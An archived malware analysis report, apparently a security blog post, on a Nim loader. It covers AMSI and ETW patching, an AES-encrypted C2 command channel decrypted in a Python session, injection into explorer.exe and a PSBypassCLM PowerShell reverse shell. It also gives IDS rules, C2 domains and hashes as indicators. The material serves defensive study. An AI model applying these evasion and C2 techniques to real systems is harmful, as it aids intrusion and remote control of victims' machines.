{
	"id": "59cda0dd-99e6-4a0d-9fe5-b81f5a49f3d6",
	"created_at": "2026-04-06T00:07:13.510695Z",
	"updated_at": "2026-04-10T03:21:13.45127Z",
	"deleted_at": null,
	"sha1_hash": "7f3a23472ef93cda8fb35fcab2a197802dbcca93",
	"title": "Unknown Nim Loader using PSBypassCLM",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1930885,
	"plain_text": "Unknown Nim Loader using PSBypassCLM\r\nBy Jason Reaves\r\nPublished: 2024-03-05 · Archived: 2026-04-05 22:23:23 UTC\r\n6 min read\r\nMar 5, 2024\r\nBy: Jason Reaves and Joshua Platt\r\nWhile investigating a range of known bad IPs related to another malware I stumbled upon some very odd looking\r\nIP addresses. Using the TLS certificate I started backtracking from domain to related malware samples in\r\nVirusTotal[1] which led to a loader that is based on NIM[2].\r\nAfter unpacking the malware, the main code block contains an AmsiScanBuffer patch followed by a\r\nEtwEventWrite patch.\r\nhttps://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd\r\nPage 1 of 16\n\nThe AmsiScanBuffer patch matches up with the proof of concept code that was released[3,4].\r\nhttps://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd\r\nPage 2 of 16\n\nThe patch:\r\nhttps://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd\r\nPage 3 of 16\n\nEtwEventWrite patch[5]:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd\r\nPage 4 of 16\n\nAfterwards the malware begins communication with the C2, first by performing a register request:\r\nhttps://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd\r\nPage 5 of 16\n\nThe response it is expecting is json data with an ‘id’ key. The error message in the malware alludes to being\r\nknown internally as a ‘node id’.\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.25.2\r\nDate: Sat, 16 Sep 2023 09:56:42 GMT\r\nContent-Type: application/json\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\n{\"id\":\"2cee1125-3252-42d3-8c07-a66456e0ca4b\"}\r\nhttps://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd\r\nPage 6 of 16\n\nThis id value is a GUID which will then be appended to a hardcoded uri of ‘/update/’ at the same C2 location:\r\nhttps://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd\r\nPage 7 of 16\n\nThe response from this request will also be json and will be expected to have a ‘commands’ key.\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.25.2\r\nDate: Sat, 16 Sep 2023 09:57:27 GMT\r\nContent-Type: application/json\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\n{\"status\":\"ok\",\"commands\":[\"{\\\"ct\\\": \\\"5sh5kMScmL2Hwz4\\/ysyKOus\\/9QXG8svokJi78biMXp\\/PmHVdT9AtrR9AhqC\r\nhttps://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd\r\nPage 8 of 16\n\nThe next thing accessed will be the ‘ct’ and ‘iv’ keys from the json blob. The ‘ct’ is the AES encrypted payload\r\nwhile the ‘iv’ is the iv value needed for the decryption.\r\nThe node id gets reused here and passed to a function performing a SHA256 on the parameter. After words the\r\ndata from ‘ct’ and ‘iv’ are base64 decoded:\r\nhttps://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd\r\nPage 9 of 16\n\nAll of this is preparation for performing AES-CFB on the base64 decoded data, the hash of the node id is the key\r\nand it uses the iv sent with the payload as the iv.\r\nhttps://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd\r\nPage 10 of 16\n\nWe can recreate this in python to prove it out:\r\n\u003e\u003e\u003e h = hashlib.sha256('2cee1125-3252-42d3-8c07-a66456e0ca4b').digest()\r\n\u003e\u003e\u003e h\r\n'p\\x07\\x9c\\xa2\\x0b\\xeadD\"\\xe5\\xa4\\x18\\xbf-]I\\x07\\xb1\\xa3\\x98`=:\\xe1\\x93\\xa8k\\xfa\\xaa\\x81\\xa9\\xa3'\r\n\u003e\u003e\u003e iv\r\n'AAAAAAAAAAAAAAAA'\r\n\u003e\u003e\u003e b = base64.b64decode(ct_cmd)\r\n\u003e\u003e\u003e aes = AES.new(h, AES.MODE_CFB, iv, segment_size=128)\r\n\u003e\u003e\u003e t = aes.decrypt(b)\r\nTraceback (most recent call last):\r\n File \"\u003cstdin\u003e\", line 1, in \u003cmodule\u003e\r\n File \"/usr/lib/python2.7/dist-packages/Crypto/Cipher/blockalgo.py\", line 295, in decrypt\r\n return self._cipher.decrypt(ciphertext)\r\nValueError: Input strings must be a multiple of the segment size 16 in length\r\n\u003e\u003e\u003e t = aes.decrypt(b[:-11])\r\n\u003e\u003e\u003e t[:1000]\r\n'update:6GOWDwBjlg8Aa87i8Y2iO3y0Bex0/H+oxk5mGRfH4AhW63/ykuMoMgYAAAAAaCgdAClC6MBko43V6qTWVcX/PccNj1aWG\r\n\u003e\u003e\u003e t[-100:]\r\nhttps://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd\r\nPage 11 of 16\n\n'Uj/wooBhMB16w++AQ++CivBw+sZRIoCRYTAdBdBgMggDCBBOsB1DEj/wUj/wooBhMB14Q++AQ++CivBw0lMaVVHRDkrcmV1TDRKS\r\n\u003e\u003e\u003e aes = AES.new(h, AES.MODE_CFB, iv, segment_size=128)\r\n\u003e\u003e\u003e t = aes.decrypt(b+'\\x00'*5)\r\n\u003e\u003e\u003e t[-100:]\r\n'Q++CivBw+sZRIoCRYTAdBdBgMggDCBBOsB1DEj/wUj/wooBhMB14Q++AQ++CivBw0lMaVVHRDkrcmV1TDRKSkJUenpLbw==\\xe5\\\r\nAfter decryption the malware will base64 decode the data after update which is a bytecode wrapped layer around a\r\nDLL. The loader in this case will inject the decoded data into a hardcoded process name, in this case\r\n‘explorer.exe’.\r\nPayload Delivered\r\nhttps://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd\r\nPage 12 of 16\n\nWe went through a number of deliveries that we were able to find but they all seemed to be the same thing, a NIM\r\ncoded DLL with a copy of PsBypassCLM.exe[6] embedded inside. The NIM coded portion had a source code file\r\nnamed:\r\n/root/mounted_app/execute_powershell.nim\r\nMain function also referred to as ‘executepowershell’:\r\nPress enter or click to view image in full size\r\nThis piece of the malware will actually talk to the same C2 as the initial loader but using a different URI.\r\nhttps://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd\r\nPage 13 of 16\n\nThe response from this is expected to be a json blob that contains the keys ‘IP’ and ‘PORT’ which will then be\r\nused with PsBypassCLM to setup a a powershell reverse shell[6].\r\nMalware code reuse:\r\nhttps://github.com/treeform/puppy\r\nGet Jason Reaves’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nhttps://github.com/adamsvoboda/nim-loader\r\nhttps://github.com/icyguider/Nimcrypt2\r\nhttps://github.com/padovah4ck/PSByPassCLM\r\nDetections\r\nFor traffic patterns we can find some of the initial loader laid out in this sandbox report[7].\r\nhttps://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd\r\nPage 14 of 16\n\nLoader registration:\r\nGET /register HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: gzip\r\nUser-Agent: Puppy\r\nHost: dlqqhrmhyuuikbqx.net\r\n$HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"NimLoader Bot Registration\"; content:\"/register\"; http_uri;\r\nLoader requests commands/deliveries:\r\nGET /update/5f04c669-b925-448c-a505-1cbf7653c261 HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: gzip\r\nUser-Agent: Puppy\r\nHost: dlqqhrmhyuuikbqx.net\r\n$HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"NimLoader PS Execute Checkin\"; content:\"/ggapi\"; http_uri; c\r\nDelivery response:\r\nData Raw: 66 36 30 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 63 6f 6d 6d 61 6e 64 73 22 3\r\nData Ascii: f60{\"status\":\"ok\",\"commands\":[\"{\\\"ct\\\": \\\"vYUvh1FpiumH5uObUJ5O9zXTyseRCt7IFDlg4lougkh6YGk\r\n$EXTERNAL_NET any -\u003e $HOME_NET any (msg:\"NimLoader Bot Command Response\"; content:\"|7b227374617475732\r\nIOCs\r\nd0f89958b779.link\r\nqt-x34-api.net\r\n6bb9b4497037.xyz\r\ndlqqhrmhyuuikbqx.net\r\nNim crypted version:\r\nf606620b5cec0edd90cdc97d0ae4552a64ff0642ce0578ca61e8a1753b017bb4\r\nRust crypted version:\r\nhttps://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd\r\nPage 15 of 16\n\nb979a029f65b8af43dc3ca9d156b6f3a3392cdc2d8b92f66c70226e86275b8fc\r\nThis version delivers a bytecode version of the loader which will also inject into a different hardcoded process:\r\nRuntimeBroker.exe\r\nReferences\r\n1:https://www.virustotal.com/\r\n2:https://nim-lang.org/\r\n3: https://rastamouse.me/memory-patching-amsi-bypass/\r\n4: https://pentestlaboratories.com/2021/05/17/amsi-bypass-methods/\r\n5:https://blog.xpnsec.com/hiding-your-dotnet-etw/\r\n6:https://github.com/padovah4ck/PSByPassCLM\r\n7:https://www.joesandbox.com/analysis/1309411/0/html\r\nSource: https://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd\r\nhttps://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd"
	],
	"report_names": [
		"unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd"
	],
	"threat_actors": [],
	"ts_created_at": 1775434033,
	"ts_updated_at": 1775791273,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7f3a23472ef93cda8fb35fcab2a197802dbcca93.pdf",
		"text": "https://archive.orkl.eu/7f3a23472ef93cda8fb35fcab2a197802dbcca93.txt",
		"img": "https://archive.orkl.eu/7f3a23472ef93cda8fb35fcab2a197802dbcca93.jpg"
	}
}